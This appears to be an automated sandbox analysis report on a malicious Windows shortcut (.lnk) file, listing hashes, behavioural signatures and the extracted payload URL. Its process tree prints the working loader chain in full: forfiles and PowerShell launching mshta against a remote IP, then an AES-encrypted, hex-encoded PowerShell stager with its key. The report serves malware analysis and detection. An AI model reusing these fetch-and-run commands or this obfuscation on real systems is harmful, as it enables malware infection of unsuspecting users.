Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
16/03/2024, 02:25
Static task
static1
Behavioral task
behavioral1
Sample
6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk
Resource
win10v2004-20240226-en
General
-
Target
6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk
-
Size
1KB
-
MD5
90a6eed71981efdcdbc0c8c0151cfb0e
-
SHA1
c21e13a29ad18e73b88eddec919b85925a95952a
-
SHA256
6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd
-
SHA512
fa7b96a7e404dc187d43f04ccd55637a959fbb7950d6b69e80539b4026cfd62460a74330dadb2a8e1578ddf0b87f31a4c8bac6451bd57130aa90f5a5bce77bbd
Malware Config
Extracted
http://89.23.98.210/qqeng
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 3 2448 mshta.exe 6 2752 powershell.exe 7 2752 powershell.exe 8 2752 powershell.exe 9 2752 powershell.exe -
Downloads MZ/PE file
-
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2792 powershell.exe 2752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 2752 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2980 wrote to memory of 2552 2980 cmd.exe 29 PID 2980 wrote to memory of 2552 2980 cmd.exe 29 PID 2980 wrote to memory of 2552 2980 cmd.exe 29 PID 2552 wrote to memory of 2792 2552 forfiles.exe 30 PID 2552 wrote to memory of 2792 2552 forfiles.exe 30 PID 2552 wrote to memory of 2792 2552 forfiles.exe 30 PID 2792 wrote to memory of 2448 2792 powershell.exe 31 PID 2792 wrote to memory of 2448 2792 powershell.exe 31 PID 2792 wrote to memory of 2448 2792 powershell.exe 31 PID 2448 wrote to memory of 2752 2448 mshta.exe 32 PID 2448 wrote to memory of 2752 2448 mshta.exe 32 PID 2448 wrote to memory of 2752 2448 mshta.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://89.23.98.210/qqeng2⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exestart mshta http://89.23.98.210/qqeng3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" http://89.23.98.210/qqeng4⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function vTMsUbI($pvPiSaK){return -split ($pvPiSaK -replace '..', '0x$& ')};$DDZuEbM = vTMsUbI('2EEA8941C1967724856754736159546956BD49A37C0FCCCC019A7902B2F7377223351478D94095CAB7F7575DB48B7888E05DA126156BA4D512049E30C56AB0565023B79613557DF933D7654B2EEFD5218913F64CC80EF58C759DA922A382A9F9A5D83DC2AA6C54F49ABE564470BBA07A95B3416A8E37F7BB5B0FF8C667135BCBDFB64E76FE8C20111234D21AF3B82F2237F9CD00D57356B8C20C45A93686D00D03286206824363AC9ABAE755EB081D827B4A8138B72E5B6B1B696C8CBAE0AB54E1ECB9BCA2DFE6AA14701349B851719FDA148BF227D2CBB1C70AC777C3246A66EB70A75BA2AC17565608748CBC6EDCCFB5B4C9F86D764406F66EFFB2CA141F284F0A7B88E1AE815F89D9252C8E77FD111E7C2F8EB1DC66C76589BAAC727BFB1EDB021E932342EB72DB318BC4A36179C0C5CF70795D0761138A36C1BD37F278A2F571C09575FFC57DEDCF79AE87941DD0BB334EC92CE64D0C8B518903BBAF7155856A83AA9286B06310D255390073E2997DB6E4763BAE864A70DF2B8300547E678644A0B2B4A91BDA0555C692CD3904B199D217D897111CB7F9E20B1C642CB25C7CCE304AAEE359D2595B3D645856E55E04E714B742BB20DD1876139871A9153834A9D96EFE8624F133EA968FF954305F71718E3BAF50BB06EF8F569D25916E4200F6DAA51DD582D0BB183265769AE45B65D59D6DAAD7D24388BC64D566198E072D0684E4A812BED119309279C01830EA4E22E0E986D31CEF7C2A700A8860377F82BC47D36C767CA408D9C9EB6C2F45F66977D04AFE326DDC0349467A342F62699007388135B07AA4A3C9019547CD4F348742E84D2EC52340910278A84BA8A79E9A40AD813D15A4D628EEEBC475733001FDC044E047CAF13540A9C3127CCCA3F27E1FDF7B392CB2AFF6D00F3D36780B548D34602D6FC9714FAA16A624B97A4AAE866B52AA4F3F992E8B73898C34BCCCDB749C0A9602E48CDCC658D9840E9FB0EC44141AADBA92D91C4CC33ECEB4B6A86B4EAB0B25DC950CDA05E4D43AADF3D92985943BA62086C4B8D487537FE589F1F86DFE1E7B7A78E8AF805F5F7C5D7B926FEB19EC212C031070A6E2745D694DD20D2CE59890EBE872C21AB5235BCA04472BE83CDF4B3825BC71CC8A1E9BEA7859DD5A23AE2BD3B6F36DF855487C05821BAFD97441F735A6A921F28249609AC3E67D699D5E691B0FD73FD15B7819E12284442C8F5EAE6BF01E542BAC9F4853D0EEFD36A521FF58A4F23B2612FB6BDA486C8B8B497AA1471320DF6CC59937B1AC74C7D939F4296E35EC04371B6B1401301D99D69CB90D4686D5C63B8B7DC8C11203511BA49E3CD22CD1B2BDF5A8207B116910025C662F5884F0465307EF278D916CDCA3FD86783830357C61D49FA6EF0C097BB53CA6300C557B64244311063A75A15B5621B8B30428F23AE2772668FC4CC6DAC4C28BFC76AA0EA698F79268317615CB97634D83EB1F8FBA3FF8C7EC2205F2B1EE5405B956543AAD2D06D64A95BE72B8E9AC61C785252BE6796AA0F0E709658F47D14139F1F35B520C3F9C5EC5A18A24C3584A73023AA3D65AC32EB0508B26A071FD8AE3D9E3BDD8A213A36B377007FADCAC3201CEB3854AB367857AABB136AFD2969226C750E0B89BF2A1C07B32D69B3094E4107552C4AA703D7F7F2EB800A4B0278DB696236D319D809E1E385510F3D69EDA54A6E1086F8109F4C3DB962DFCC471A47F9081EDB814AD5D135FFA05FA684E4D391AA0D1BA4C37C1271DD00A69F6879455E63626F084172FA8F3D95F6A');$bftik = [System.Security.Cryptography.Aes]::Create();$bftik.Key = vTMsUbI('55676E624475754F69737A6879546E70');$bftik.IV = New-Object byte[] 16;$lJcHtpBA = $bftik.CreateDecryptor();$UZsjRnWNL = $lJcHtpBA.TransformFinalBlock($DDZuEbM, 0, $DDZuEbM.Length);$UVWwHyrcG = [System.Text.Encoding]::Utf8.GetString($UZsjRnWNL);$lJcHtpBA.Dispose();& $UVWwHyrcG.Substring(0,3) $UVWwHyrcG.Substring(3)5⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52877d5092f7f51adfea48540a189ff30
SHA15d27075ccc2aab431c8733df6384090898a06a82
SHA256499fd9bc92a9688afdf07a00fe652e50a5c590ca9e533f0b7f5da9991624fd3f
SHA51263c93e4aabb39b260aa071eac74ff07f0e1687628eb880734bc5c17f6aa46e3aed6b0b4cc8cd3420093c20e48f65a778ff4f309fc9f4cba8a8a0590417aea56b